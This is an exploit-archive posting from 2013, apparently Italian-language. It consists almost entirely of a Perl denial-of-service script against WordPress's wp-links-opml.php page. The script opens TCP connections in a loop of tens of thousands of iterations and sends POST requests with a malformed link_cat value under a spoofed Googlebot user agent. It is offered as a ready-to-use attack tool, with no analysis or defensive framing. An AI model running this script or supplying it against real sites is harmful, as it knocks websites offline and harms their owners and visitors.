Wordpress (wp-links-opml.php Page) Denial of Service

2013-06-09 16:03:46
Inviato da: irist.ir

#!/usr/bin/perl
#####################################
# Wordpress (wp-links-opml.php Page) Denial of Service
# Version: All Version
# Code Written By Amir
# Home Page = Www.IrIsT.Ir - Www.IrIsT.Ir/forum
# Greats : B3HZ4D - C0dex - TaK.FaNaR - F@rid - Beni_Vanda - dr.koderz - Mr Zer0 - Smartprogrammer - z3r0
# sajjad13and11 - silent - Bl4ck M4n - AHAAD - ARTA - Dj.TiniVini - E2MA3N - Immortal Boy - IR Anonymous
# Mikili - Mr.F@RDIN - Net.W0lf - skote_vahshat - Net.W0lf - MedRiK & All Member In IrIsT.Ir
#####################################
use IO::Socket;

$host = $ARGV[0];
$path = $ARGV[1];

if(!$ARGV[1])
{
print "################################################# \n";
print "## Wordpress (wp-links-opml.php Page) Denial of Service\n";
print "## Discoverd By Amir \n";
print "## Www.IrIsT.Ir/forum \n";
print "################################################# \n";
print "## [host] [path] \n";
print "## host.com /patch\n";
print "################################################# \n";
exit();
}
for($i=0; $i<99999; $i++)
{
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");
$post = "link_cat=0%0%0%0%0%0%0";
$pack.= "POST " .$path. "/wp-links-opml.php HTTP/1.1\r\n";
$pack.= "Host: " .$host. "\r\n";
$pack.= "User-Agent: Googlebot/2.1\r\n";
$pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
$pack.= "Content-Length: " .length($post). "\r\n\r\n";
$pack.= $post;
print $socket $pack;
syswrite STDOUT, "*";
}

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.